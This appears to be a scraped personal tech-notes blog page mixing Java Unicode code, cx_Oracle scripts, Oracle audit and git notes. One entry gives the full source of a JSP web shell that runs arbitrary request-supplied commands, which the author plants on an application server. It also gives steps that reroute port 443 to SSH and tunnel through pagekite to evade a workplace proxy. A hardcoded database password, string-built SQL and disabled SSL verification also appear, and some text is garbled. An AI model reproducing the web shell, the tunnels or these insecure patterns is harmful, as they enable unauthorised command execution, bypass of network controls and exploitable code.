U0400: Cyrillic
U0500: Cyrillic Supplement
U0530: Armenian
U0590: Hebrew
U0600: Arabic
U0700: Syriac
U0750: Arabic Supplement
U0780: Thaana
U07C0: NKo
U0800: Samaritan
U0840: Mandaic
U08A0: Arabic Extended-A
U0900: Devanagari
U0980: Bengali
U0A00: Gurmukhi
U0A80: Gujarati
U0B00: Oriya
U0B80: Tamil
U0C00: Telugu
U0C80: Kannada
U0D00: Malayalam
U0D80: Sinhala
U0E00: Thai
U0E80: Lao
U0F00: Tibetan
U1000: Myanmar
U10A0: Georgian
U1100: Hangul Jamo
U1200: Ethiopic
U1380: Ethiopic Supplement
U13A0: Cherokee
U1400: Unified Canadian Aboriginal Syllabics
U1680: Ogham
U16A0: Runic
U1700: Tagalog
U1720: Hanunoo
U1740: Buhid
U1760: Tagbanwa
U1780: Khmer
U1800: Mongolian
U18B0: Unified Canadian Aboriginal Syllabics Extended
U1900: Limbu
U1950: Tai Le
U1980: New Tai Lue
U19E0: Khmer Symbols
U1A00: Buginese
U1A20: Tai Tham
U1B00: Balinese
U1B80: Sundanese
U1BC0: Batak
U1C00: Lepcha
U1C50: Ol Chiki
U1CC0: Sundanese Supplement
U1CD0: Vedic Extensions
U1D00: Phonetic Extensions
U1D80: Phonetic Extensions Supplement
U1DC0: Combining Diacritical Marks Supplement
U1E00: Latin Extended Additional
U1F00: Greek Extended
U2000: General Punct
UAtion
U2070: Superscripts and Subscripts
U20A0: Currency Symbols
U20D0: Combining Diacritical Marks for Symbols
U2100: Letterlike Symbols
U2150: Number Forms
U2190: Arrows
U2200: Mathematical Operators
U2300: Miscellaneous Technical
U2400: Control Pictures
U2440: Optical Character Recognition
U2460: Enclosed Alphanumerics
U2500: Box Drawing
U2580: Block Elements
U25A0: Geometric Shapes
U2600: Miscellaneous Symbols
U2700: Dingbats
U27C0: Miscellaneous Mathematical Symbols-A
U27F0: Supplemental Arrows-A
U2800: Braille Patterns
U2900: Supplemental Arrows-B
U2980: Miscellaneous Mathematical Symbols-B
U2A00: Supplemental Mathematical Operators
U2B00: Miscellaneous Symbols and Arrows
U2C00: Glagolitic
U2C60: Latin Extended-C
U2C80: Coptic
U2D00: Georgian Supplement
U2D30: Tifinagh
U2D80: Ethiopic Extended
U2DE0: Cyrillic Extended-A
U2E00: Supplemental Punct
UAtion
U2E80: CJK Radicals Supplement
U2F00: Kangxi Radicals
U2FF0: Ideographic Description Characters
U3000: CJK Symbols and Punct
UAtion
U3040: Hiragana
U30A0: Katakana
U3100: Bopomofo
U3130: Hangul Compatibility Jamo
U3190: Kanbun
U31A0: Bopomofo Extended
U31C0: CJK Strokes
U31F0: Katakana Phonetic Extensions
U3200: Enclosed CJK Letters and Months
U3300: CJK Compatibility
U3400: CJK Unified Ideographs Extension A
U4DC0: Yijing Hexagram Symbols
U4E00: CJK Unified Ideographs
UA000: Yi Syllables
UA490: Yi Radicals
UA4D0: Lisu
UA500: Vai
UA640: Cyrillic Extended-B
UA6A0: Bamum
UA700: Modifier Tone Letters
UA720: Latin Extended-D
UA800: Syloti Nagri
UA830: Common Indic Number Forms
UA840: Phags-pa
UA880: Saurashtra
UA8E0: Devanagari Extended
UA900: Kayah Li
UA930: Rejang
UA960: Hangul Jamo Extended-A
UA980: Javanese
UAA00: Cham
UAA60: Myanmar Extended-A
UAA80: Tai Viet
UAAE0: Meetei Mayek Extensions
UAB00: Ethiopic Extended-A
UABC0: Meetei Mayek
UAC00: Hangul Syllables
UD7B0: Hangul Jamo Extended-B
UD800: High Surrogates
UDB80: High Private Use Surrogates
UDC00: Low Surrogates UE000: Private Use Area
UF900: CJK Compatibility Ideographs
UFB00: Alphabetic Presentation Forms
UFB50: Arabic Presentation Forms-A
UFE00: Variation Selectors
UFE10: Vertical Forms
UFE20: Combining Half Marks
UFE30: CJK Compatibility Forms
UFE50: Small Form Variants
UFE70: Arabic Presentation Forms-B
UFF00: Halfwidth and Fullwidth Forms
UFFF0: Specials
U10000: Linear B Syllabary
U10080: Linear B Ideograms
U10100: Aegean Numbers
U10140: Ancient Greek Numbers
U10190: Ancient Symbols
U101D0: Phaistos Disc
U10280: Lycian
U102A0: Carian
U10300: Old Italic
U10330: Gothic
U10380: Ugaritic
U103A0: Old Persian
U10400: Deseret
U10450: Shavian
U10480: Osmanya
U10800: Cypriot Syllabary
U10840: Imperial Aramaic
U10900: Phoenician
U10920: Lydian
U10980: Meroitic Hieroglyphs
U109A0: Meroitic Cursive
U10A00: Kharoshthi
U10A60: Old South Arabian
U10B00: Avestan
U10B40: Inscriptional Parthian
U10B60: Inscriptional Pahlavi
U10C00: Old Turkic
U10E60: Rumi Numeral Symbols
U11000: Brahmi
U11080: Kaithi
U110D0: Sora Sompeng
U11100: Chakma
U11180: Sharada
U11680: Takri
U12000: Cuneiform
U12400: Cuneiform Numbers and Punctuation
U13000: Egyptian Hieroglyphs
U16800: Bamum Supplement
U16F00: Miao
U1B000: Kana Supplement
U1D000: Byzantine Musical Symbols
U1D100: Musical Symbols
U1D200: Ancient Greek Musical Notation
U1D300: Tai XUAn Jing Symbols
U1D360: Counting Rod Numerals
U1D400: Mathematical Alphanumeric Symbols
U1EE00: Arabic Mathematical Alphabetic Symbols
U1F000: Mahjong Tiles
U1F030: Domino Tiles
U1F0A0: Playing Cards
U1F100: Enclosed Alphanumeric Supplement
U1F200: Enclosed Ideographic Supplement
U1F300: Miscellaneous Symbols And Pictographs
U1F600: Emoticons
U1F680: Transport And Map Symbols
U1F700: Alchemical Symbols ►
U20000: CJK Unified Ideographs Extension B
U2A700: CJK Unified Ideographs Extension C
U2B740: CJK Unified Ideographs Extension D
U2F800: CJK Compatibility Ideographs Supplement UE0000: Tags UE0100: Variation Selectors Supplement
UF0000: Supplementary Private Use Area-A
U100000: Supplementary Private Use Area-B Outdated Tutorials
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
package xx;

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.OutputStreamWriter;
import java.math.BigDecimal;
import java.math.BigInteger;

import org.apache.xmlbeans.XmlException;
import org.apache.xmlbeans.impl.piccolo.xml.XMLStreamReader;
import org.openuri.easypo.LineItem;
import org.openuri.easypo.PurchaseOrderDocument;

public class Test {
public static void main(String[] args) throws IOException, XmlException {

String u = "\uD840\uDC08asasa";

System.out.println(u + "+ " + u.length());
System.out.println(Character.isHighSurrogate(u.charAt(0)));
System.out.println("isSupplementaryCodePoint " + Character.isSupplementaryCodePoint(u.charAt(0)));
System.out.println((int) u.charAt(1));
System.out.println("codePoint = > " + (int) u.codePointAt(0) + ", 0x" + Integer.toHexString(u.codePointAt(0)));

System.out.println("@@@ " + u.codePointCount(0, u.length()));

String s = String.valueOf(Character.toChars(0x200D9));
System.out.println("<<< " + Character.isSupplementaryCodePoint(0x200D9));
char[] chars = s.toCharArray();
for (char c : chars) {
System.out.format("BB => %x\n", (short) c);
}

System.out.format("hex -> decimal %s\n", 0x2F81A);

InputStream in = new FileInputStream("C:/easypo.xml");
byte[] bufferd = new byte[4096];
int length = 0;
StringBuilder sb = new StringBuilder();
while ((length = in.read(bufferd)) != -1) {
sb.append(new String(bufferd, 0, length, "UTF-16BE"));
}

OutputStream os = new FileOutputStream("C:/out2.txt");
//OutputStreamWriter wr = new OutputStreamWriter(os);
os.write(0xfe);
os.write(0xff);

// UTF-8
//os.write(0xef);
//os.write(0xbb);
//os.write(0xbf);

StringBuilder sb2 = new StringBuilder();
for (int i = 1; i < sb.length() - 1; i++) {
//sb2.append(sb.charAt(i));

//System.out.println("code Point => " + sb.charAt(i + 1));
if (Character.isHighSurrogate(sb.charAt(i)) || Character.isLowSurrogate(sb.charAt(i))) {

String code = Integer.toHexString(sb.charAt(i));
os.write(Integer.decode("0x" + code.substring(0, 2)));
os.write(Integer.decode("0x" + code.substring(2, 4)));

code = Integer.toHexString(sb.charAt(i + 1));
os.write(Integer.decode("0x" + code.substring(0, 2)));
os.write(Integer.decode("0x" + code.substring(2, 4)));

i++;
} else {
if (Character.isDefined(sb.charAt(i)))
sb2.append(sb.charAt(i));
}
}

File poXmlFile = new File("C:/easypo.xml");
//System.out.println("AAAAAAAAA " + sb2.toString());

String updatedPoXml = addLineItem(sb2.toString(), s, "5", "20.00", "6");
//String updatedPoXml = addLineItem(poXmlFile, "a new Item", "5", "20.00", "6");
//System.out.println(new String(updatedPoXml.getBytes("UTF-8"), "UTF-8"));

//wr.close();
os.close();

}

private static String addLineItem(String purchaseOrder, String itemDescription, String perUnitOuncesString,
String itemPriceString, String itemQuantityString) throws XmlException, IOException {
PurchaseOrderDocument poDoc = null;

XMLStreamReader reader = new XMLStreamReader();
poDoc = PurchaseOrderDocument.Factory.parse(purchaseOrder);

// Convert incoming data to types that can be used in accessors.
BigDecimal perUnitOunces = new BigDecimal(perUnitOuncesString);
BigDecimal itemPrice = new BigDecimal(itemPriceString);
BigInteger itemQUAntity = new BigInteger(itemQuantityString);

// Add the new element.
LineItem newItem = poDoc.getPurchaseOrder().addNewLineItem();
newItem.setDescription(itemDescription);
newItem.setPerUnitOunces(perUnitOunces);
newItem.setPrice(itemPrice);
newItem.setQuantity(itemQuantity);

return poDoc.toString();
}
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
private String processInterfaceStr(String interfaceStr, HashMap extBCharMap) throws IOException {
StringBuilder output = new StringBuilder();

for (int i = 0; i < interfaceStr.length(); i++) {
if (Character.isHighSurrogate(interfaceStr.charAt(i))
|| Character.isLowSurrogate(interfaceStr.charAt(i))) {
ByteArrayOutputStream surrogatePair = new ByteArrayOutputStream();
String code = Integer.toHexString(interfaceStr.charAt(i));
int part1 = Integer.decode("0x" + code.substring(0, 2));
int part2 = Integer.decode("0x" + code.substring(2, 4));

surrogatePair.write(part1);
surrogatePair.write(part2);

code = Integer.toHexString(interfaceStr.charAt(i + 1));
part1 = Integer.decode("0x" + code.substring(0, 2));
part2 = Integer.decode("0x" + code.substring(2, 4));

surrogatePair.write(part1);
surrogatePair.write(part2);
surrogatePair.close();

i++;

output.append("${" + extBCharMap.size() + "}");
extBCharMap.put(String.valueOf(extBCharMap.size()),
surrogatePair.toString("UTF-16BE"));
} else {
if (Character.isDefined(interfaceStr.charAt(i)))
output.append(interfaceStr.charAt(i));
}
}

return output.toString();
}

private static void checkExtBCharMap(HashMap extBCharMap) throws Exception {
if (extBCharMap.size() > 0) {
StringBuilder sb = new StringBuilder();
for (String extBChar : extBCharMap.values()) {
sb.append(showHexCode(extBChar));
}
Exception e = new Exception( "Surrogate pair characters are found in unexpected fields. " + sb.toString());
throw e;
}
}

private static String showHexCode(String extBChar) {
StringBuilder sb = new StringBuilder();

String codepoint = "U+" + Long.toHexString(extBChar.codePointAt(0)).toUpperCase();

sb.append(codepoint);

sb.append(" ");

/*for (short i = 0; i < extBChar.length();i++) {
String code = Long.toHexString(extBChar.charAt(i));

sb.append("0x" + code);
sb.append(" ");
}*/

return sb.toString();

}

// private method(s) -- END public static void main(String[] args) throws Exception {
HashMap extBCharMap = new HashMap();

ByteArrayOutputStream surrogatePair = new ByteArrayOutputStream();

int a = Integer.decode("0x" + Long.toHexString(Long.parseLong("11011000", 2)));

System.out.println("a = " + a);

int b = Integer.decode("0x" + Long.toHexString(Long.parseLong("01000000", 2)));

surrogatePair.write(a);

surrogatePair.write(b);

a = Integer.decode("0x" + Long.toHexString(Long.parseLong("11011100", 2)));
b = Integer.decode("0x" + Long.toHexString(Long.parseLong("11011001", 2)));

surrogatePair.write(a);
surrogatePair.write(b);
surrogatePair.close();

extBCharMap.put("1", surrogatePair.toString("UTF-16BE"));
extBCharMap.put("2", surrogatePair.toString("UTF-16BE"));

replacePlaceHolder(extBCharMap, "bb${1}uiuiu", "CASEAP", "CHI_SURNAME", "1235", "AP_CHI_FIRST");

System.out.println("size of extBCharMap: " + extBCharMap.size());
checkExtBCharMap(extBCharMap);
}

insert clob field by cx_Oracle

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
import cx_Oracle, os

os.environ["NLS_LANG"] = "TRADITIONAL CHINESE_HONG KONG.AL32UTF8"

def main():
dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='xxrac')
con = cx_Oracle.connect('user','password',dsn_tns)

try:
cur = con.cursor()
for i in range(50):
report_id = '%LSA' + str(i).rjust(3, '0') + '%'
#print report_id
cur.execute("SELECT rpt_url from print_para where rpt_url like '%s' ORDER BY last_update desc" %(report_id))
row = cur.fetchone()
if row != None:
print 'http://xxserver' + row[0]

cur.close()
finally:
print 'close connection'
con.close()

def insert_news():
dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='xxrac')
con = cx_Oracle.connect('user2','user2uat0675',dsn_tns)

dhprd_dsn_tns = cx_Oracle.makedsn('server2', 1521, 'prd')
dhprd_con = cx_Oracle.connect('user2x','password',prd_dsn_tns)

try:
dhprd_cur = dhprd_con.cursor()
dhprd_cur.execute("SELECT NEWS_ID,GROUP_ID,CREATION_DATE,PUBLISH_START_DATE,PUBLISH_END_DATE,NEWS_TITLE,NEWS_TITLE_CHI,STATUS,LAST_UPDATE,UPDATE_BY,UPDATE_ROLE,NEWS_TYPE,URL,URL_CHI,URL_SIMP_CHI,PRESS_RELEASE, NEWS_CONTENT from news ")
res = dhprd_cur.fetchall()

for row in res:
cur = con.cursor()
print row[0]
NEWS_ID = row[0]
GROUP_ID = row[1]
CREATION_DATE = row[2]
PUBLISH_START_DATE = row[3]
PUBLISH_END_DATE = row[4]
NEWS_TITLE = row[5]
NEWS_TITLE_CHI = row[6]
STATUS = row[7]
LAST_UPDATE = row[8]
UPDATE_BY = row[9]
UPDATE_ROLE = row[10]
NEWS_TYPE = row[11]
URL = row[12]
URL_CHI = row[13]
URL_SIMP_CHI = row[14]
PRESS_RELEASE = row[15]
NEWS_CONTENT = row[16]

#cur.execute("insert into news(NEWS_ID,GROUP_ID,CREATION_DATE,PUBLISH_START_DATE,PUBLISH_END_DATE,NEWS_TITLE,NEWS_TITLE_CHI,STATUS,LAST_UPDATE,UPDATE_BY,UPDATE_ROLE,NEWS_TYPE,URL,URL_CHI,URL_SIMP_CHI,PRESS_RELEASE) values (:NEWS_ID,:GROUP_ID,:CREATION_DATE,:PUBLISH_START_DATE,:PUBLISH_END_DATE,:NEWS_TITLE,:NEWS_TITLE_CHI,:STATUS,:LAST_UPDATE,:UPDATE_BY,:UPDATE_ROLE,:NEWS_TYPE,:URL,:URL_CHI,:URL_SIMP_CHI,:PRESS_RELEASE)", {'NEWS_ID' : NEWS_ID,'GROUP_ID' : GROUP_ID,'CREATION_DATE' : CREATION_DATE,'PUBLISH_START_DATE' : PUBLISH_START_DATE,'PUBLISH_END_DATE' : PUBLISH_END_DATE,'NEWS_TITLE' : NEWS_TITLE,'NEWS_TITLE_CHI' : NEWS_TITLE_CHI,'STATUS' : STATUS,'LAST_UPDATE' : LAST_UPDATE,'UPDATE_BY' : UPDATE_BY,'UPDATE_ROLE' : UPDATE_ROLE,'NEWS_TYPE' : NEWS_TYPE,'URL' : URL,'URL_CHI' : URL_CHI,'URL_SIMP_CHI' : URL_SIMP_CHI,'PRESS_RELEASE' : PRESS_RELEASE})

#cur.execute("update news set NEWS_CONTENT = :NEWS_CONTENT, NEWS_CONTENT_CHI = :NEWS_CONTENT_CHI where news_id = :news_id", {'news_id':NEWS_ID, 'NEWS_CONTENT':'aa', 'NEWS_CONTENT_CHI':'bb'})

#cur.execute("select NEWS_CONTENT from news where news_id = :news_id for update", {'news_id':NEWS_ID})
print NEWS_CONTENT.read()
'''row2, = cur.fetchone()
print NEWS_CONTENT.read()
row2.write(NEWS_CONTENT.read())'''
#con.commit()
cur.close()
break

dhprd_cur.close()

finally:
print 'close connection'
con.close()
dhprd_con.close()



def insert_news_content():
dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='xxrac')
con = cx_Oracle.connect('user2','user2uat0675',dsn_tns)

dhprd_dsn_tns = cx_Oracle.makedsn('server2', 1521, 'prd')
dhprd_con = cx_Oracle.connect('user2','password',dhprd_dsn_tns)

try:
dhprd_cur = dhprd_con.cursor()
dhprd_cur.execute("SELECT NEWS_ID from news order by NEWS_ID")
res = dhprd_cur.fetchall()
news_ids = []
for row in res:
news_ids.append(row[0])


for NEWS_ID in news_ids:
dhprd_cur.execute("SELECT NEWS_ID, NEWS_CONTENT, NEWS_CONTENT_CHI from news where NEWS_ID = :NEWS_ID", {'NEWS_ID':NEWS_ID})
row = dhprd_cur.fetchone()

NEWS_ID = row[0]
NEWS_CONTENT = row[1].read()
NEWS_CONTENT_CHI = row[2].read()

cur = con.cursor()

print NEWS_ID
cur.execute('select news_content, news_content_chi from news where news_id = :news_id for update', {'news_id':NEWS_ID})
c1, c2 = cur.fetchone()
c1.open()
c1.trim()
c1.write(NEWS_CONTENT)
c1.close()

c2.open()
c2.trim()
c2.write(NEWS_CONTENT_CHI)
c2.close()

con.commit()
cur.close()
dhprd_cur.close()

finally:
print 'close connection'
con.close()
dhprd_con.close()

insert_news_content()

rsync in aix

  • Install popt-1.7-1.aix4.3.ppc.rpm & rsync-2.5.4-3.aix5.1.ppc.rpm from http://bullfreeware.com/
  • Check manual by rsync –help
  • Write shell script as below
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    LOGDIR=/usr/prod/logs
    LOGFILE=rsync.log
    startBackup() {
    echo "****** Start backup now `date`"
    rsync -uptorgvlHaz -e "ssh -i /home/user/.ssh/id_dsa" /source_directory/* support@remote_server:/destination
    echo "****** Finish backup at `date`"
    echo ""
    }
    main() {
    startBackup
    }
    main &raquo; $LOGDIR/$LOGFILE 2>&1

Refer to Easy Automated Snapshot-Style Backups with Linux and Rsync
Using rsync and cron to automate incremental backups

Enable audit in oracle

Check audit settting

select name,value from v$parameter where name like 'audit%'
show parameter audit;

Change setting of audit_trail

Method 1

1
2
alter system set audit_trail=DB,Extended scope=spfile (cannot set both as Change Static Parameters Through the SPFILE)
alter system set audit_sys_operations=true scope=spfile

Method 2

  • add config in $ORACLE_HOME/dbs/init**.ora as below since db starting with pfile, error **’specified initialization parameter can not be modified’*
  • audit_trail=DB ( oracle9i not support ‘Extended’ in init*.ora file)
  • audit_sys_operations=true

Restart db

1
2
shutdown immediate;
startup;

Check audit option in db

select * from dba_stmt_audit_opts OR select * from dba_priv_audit_opts

Make some audit option

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
AUDIT ALTER TABLE;
AUDIT DELETE ANY TABLE;
AUDIT DROP ANY TABLE;
AUDIT AUDIT ANY;
AUDIT AUDIT SYSTEM;

AUDIT ALL BY FRED BY ACCESS;
audit select table, update table, delete table,
insert table, execute procedure by FRED by access;

AUDIT SELECT, INSERT, DELETE
ON jward.dept
BY ACCESS
WHENEVER SUCCESSFUL;

AUDIT SELECT TABLE, INSERT TABLE, DELETE TABLE, EXECUTE PROCEDURE
BY ACCESS
WHENEVER NOT SUCCESSFUL;

AUDIT SELECT, UPDATE, DELETE ON SYS.AUD$ BY ACCESS;
-------- disable them
NOAUDIT ALTER TABLE;
...

List audit record

1
2
3
4
select * from dba_audit_session order by timestamp desc
select * from dba_audit_trail order by timestamp desc
select * from dba_audit_object order by timestamp desc;
select * from dba_audit_statement order by timestamp desc;

House keep sys.aud$ to reduce its size

truncate sys.aud$ or delete sys.aud$

Trace user’s behavior

show parameter dump

  • Find background_dump_dest/alert_sid.log
  • This file would give you some info about user’s behavior in user_dump_dest/sid_ora_pid.trc

Example

A user Fred was missing someday in db, how to find out the reason. Follow these step

  • check alert.log
  • check sid_ora_pid.trc
  • check dba_audit_session and dba_audit_trail

Get the user’s role and privilege

  • USER_SYS_PRIVS, USER_TAB_PRIVS, USER_ROLE_PRIVS
  • DBA_SYS_PRIVS, DBA_TAB_PRIVS, DBA_ROLE_PRIVS

select * from DBA_role_privs

Misc

xming + putty + X11 forwarding
run $ORACLE_HOME/bin/dbca

Reference

Oracle audit command tips
Introduction to Simple Oracle Auditing
Configuring and Administering Auditing
Auditing Database Activity
Auditing Database Use
Verifying Security Access with Auditing
Starting Up a Database
Spfile and Init.ora Parameter File Startup of an Oracle9i Instance
Change Static Parameters Through the SPFILE
Oracle_9i_AUDIT_SOP
Oracle Audit 审计
Managing User Privileges and Roles

dive into git

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
git clone = svn co
git remote show = svn info
git branch + git checkout = git switch

git clone = git init + git remote

step:
git init
mkdir project.git
cd project.git
git remote add -f -t master -m master orgin git://example.com/git.git (or https://example.com/git.git)
git merge origin
touch file.txt
git commit -m 'test commit'
git push origin master

1
2
3
4
git branch
git checkout
git rebase
git reset --hard

Pass value to report engine via prompt dialog

There are two mode that call to render a report template,
Crystal Report can be called with/without paramter values to render a report template. When it is called without parameter, an input dialog will be prompted.
Those parameter values are serialized by JSON format, the parameter names are as following:

  • CRVCompositeViewState
  • CRVEventTarget
  • CRVEventArgument

It is found that a warning message the report requires parameter values that need to be supplied by the client before further processing” will be shown when values are entered.
So upset!!
I used curl to debug the program, found that parameter CRVCompositeViewState and CRVEventTarget would affect the result of putting paramter value to report.
No idea, to solve the problem, I used a ugly approach that removing parameter CRVCompositeViewState and CRVEventTarget in allInOne.js to let them not be passed to server side.

Reference
升级Crystal Report 8.5 to Crystal Report 2011

Create sock proxy via remote PC as a springboard

Install cygwin in my remote PC

Upload a console.jsp to application server

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<%@page import="java.io.*" %>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>

<script type="text/javascript">
$(function(){
$("#command").focus();
var cmd = '<%=request.getParameter("command")%>';
$("#command").val(cmd == 'null' ? '' : cmd);
});
</script>


<body bgcolor="#cdc0cd">
<form action="console.jsp">
Command: <textarea name="command" rows="10" cols="50" id="command"></textarea><br/>
<input type="submit" name="submit" value="submit"/>
</form>

<%
String cmd = request.getParameter("command");
if(cmd != null && cmd.length() > 0){
//Runtime.getRuntime().exec(cmd);
out.println("command = " + cmd + "<p><p>");
StringBuilder sb = new StringBuilder();
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd);

BufferedReader stdInput = new BufferedReader(new
InputStreamReader(p.getInputStream()));

BufferedReader stdError = new BufferedReader(new
InputStreamReader(p.getErrorStream()));

out.print("<h2>result as below</h2>");
while ((s = stdInput.readLine()) != null) {
sb.append(s+"<br/>");
}

// read any errors from the attempted command
sb.append("<hr><h2>error as below(if any)</h2>");
while ((s = stdError.readLine()) != null) {
sb.append(s);
}
out.print(sb.toString());
}
catch (IOException e) {
sb.append("exception happened - here's what I know: ");
e.printStackTrace();
}
}
%>

Disable port 443 in httpd

1
2
3
ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/443-hide.bat
copy "C:\Program Files\IBM\HTTPServer\conf\httpd.conf" "C:\Users\xx\Downloads\fw\httpd-latest.conf"
copy "C:\Users\xx\Downloads\fw\httpd2.conf" "C:\Program Files\IBM\HTTPServer\conf\httpd.conf"
1
2
3
ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/restart.bat 
net stop IBMHTTPServer7.0
net start IBMHTTPServer7.0

Forward port 443 to 22

1
2
3
4
ssh -i /home/prls/fw/id_rsa xx@server /cygdrive/c/Users/xx/fw/443-open.bat 
rem wscript.exe C:\Users\xx\Downloads\fw\443-open.vbs C:\Users\xx\Downloads\plink.exe -load local -N <span style="font-size:12.5px;line-height:1.5;"></span> 5. Stop process plink
tasklist|grep plink
taskkill /f /pid 7944

Enable port 443 in httpd

1
2
ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/443-show.bat
copy "C:\Users\xx\Downloads\fw\httpd-latest.conf" "C:\Program Files\IBM\HTTPServer\conf\httpd.conf"

See config in httpd

1
2
ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/cat-httpd.bat
copy "C:\Users\xx\Downloads\fw\httpd-latest.conf" "C:\Program Files\IBM\HTTPServer\conf\httpd.conf"

Make it effective

ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/restart.bat

Fallback a backup version

ssh -i /home/prls/fw/id_rsa Administrator@server /cygdrive/c/Users/xx/fw/443-fallback.bat

Make my home's PC as proxy server to surf internet

Step

At home

  • Install cygwin and openssh package in my home’s PC
  • Install pagekite and run following command as a scheduled job
    python.exe pagekite.py 22 ssh:YOU.pagekite.me

At workstation

  • Use putty to login YOU.pagekite.me:22 through http proxy **YOU.pagekite.me:443
  • Create dynamic port forwarding -D1080 in localhost
  • In putty: Connection -> Seconds between keepalives should be larger than 0(such as 10)
  • Setup firefox to use socks proxy localhost:1080

Another method(Using Squid)

  • at home: install squid
  • at workstation: using putty to create local port forwarding: **-L3128:localhost:3128
  • Setup firefox to use http proxy localhost:3128

PS: Proxy tools

connect or netcat or corkscrew or nc proxycap or httptunnel stunnel

Reverse Proxy

pagekite
localtunnel
proxylocal

VNC

vnc loopback connections are not enabled
Solved:

Reference

ssh pagekite
putty pagekite
安裝 Squid Proxy Server @ Windows XP

setup dynamic port forwarding

SSH Dynamic Port Forwarding
Proxies_and_Jump_Hosts

Troubleshoot

SSH using a SOCKS or HTTP proxy
Network error: Software caused connection abort
How can I use SSH with a SOCKS 5 proxy

Others(must read)

SSH as socks proxy through multiple hosts (with http proxy involved)
SSH as socks proxy through multiple hosts
SSH Through or Over Proxy
Proxy Firefox through a SSH tunnel
What’s the difference between SSH and Squid when using them as proxies
SSH Tunneling Explained
PySocksipyChain
Secure+Tunnels/Hack+76+Encrypt+and+Tunnel+Traffic+with+SSL

Run a program as windows service or background job

nssm

Download nssm from http://nssm.cc/download and follow its usage to install custom program as service.

instsrv

  • instsrv myProgram “c:\Program Files\Windows Resource Kits\Tools\srvany.exe”
  • install_service.reg
    1
    2
    3
    4
    5
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\myProgram\Parameters]
    "AppDirectory"="d:\\bin\\myProgram"
    "Application"="D:\\bin\\myProgram\\myProgram.exe"
    "AppParameters"="-d -f d:\\MyWorkDir\\myProgram.ini"
  • sc config myProgram depend= Tcpip
  • net start myProgram or sc start myProgram

java

1
2
3
4
5
6
7
public class Run{
public static void main(String[] args) throws InterruptedException, IOException {
Process pr = Runtime.getRuntime().exec("D:\\bin\\myProgram\\myProgram.exe -d -f d:\\MyWorkDir\\myProgram.ini");
pr.waitFor();
}
}
javaw -cp . Run

wscript

run.vbs

1
2
3
Set WshShell = WScript.CreateObject("WScript.Shell")
obj = WshShell.Run("plink.exe -load remotes_server -N", 0)
set WshShell = Nothing

wscript run.vbs

at

if the session is closed such as remote desktop(mstsc), above program will be shutdown. But schedule job has no this problem at 17:50 wscript run.vbs then delete this scheduled job

run nohup in cygwin

nohup wscript run.vbs 2>&1 &

SSL certificate problem using git in AIX

After installed git in AIX, when run git clone found that SSL certificate problem: unable to get local issuer certificate
Solution as below collected from google

No ssl verify

  • export GIT_SSL_NO_VERIFY=true ( unset GIT_SSL_NO_VERIFY)
  • git config http.sslVerify false ( git config --unset http.sslVerify)
  • curl http://curl.haxx.se/ca/cacert.pem -o /var/ssl/cacert.pem (not work, but no /etc/ssl or /etc/openssl folder in AIX)

SSL verify

  • .git/config
    1
    2
    [http]
    sslCAInfo=/var/ssl/certs/cacert.pem
  • git config --system (or --global or --local) http.sslcainfo /var/ssl/certs/cacert.pem

http://stackoverflow.com/questions/3777075/ssl-certificate-rejected-trying-to-access-github-over-https-behind-firewallrhttp://stackoverflow.com/questions/3777075/ssl-certificate-rejected-trying-to-access-github-over-https-behind-firewall

安装wssh, zdaemon,pagekite等

安装wssh遇到许多问题和有趣的东西,记录如下:

  • 要安装wssh,需要先装 geventpyCrypto,其余用 sudo pip install flask paramiko werkzeug jinja2 ecdsa gevent-websocket
  • https://github.com/aluzzardi/wssh.git下载wssh python setup.py install 运行sudo wsshd, 如果发现缺少包,就用pip install
  • fix问题, 用浏览器打开http://ip:5000
  • change from geventwebsocket import WebSocketHandler to from geventwebsocket.handler import WebSocketHandler in file EGG-INFO/scripts/wsshd
  • change raw.github.com to rawgithub.com in file wssh/templates/index.html
  • 运行命令sudo wssh也可以连接
  • 安装zdaemon,
    1
    2
    pip install zdaemon
    zdaemon -p wsshd start
  • 安装PageKite
    1
    2
    3
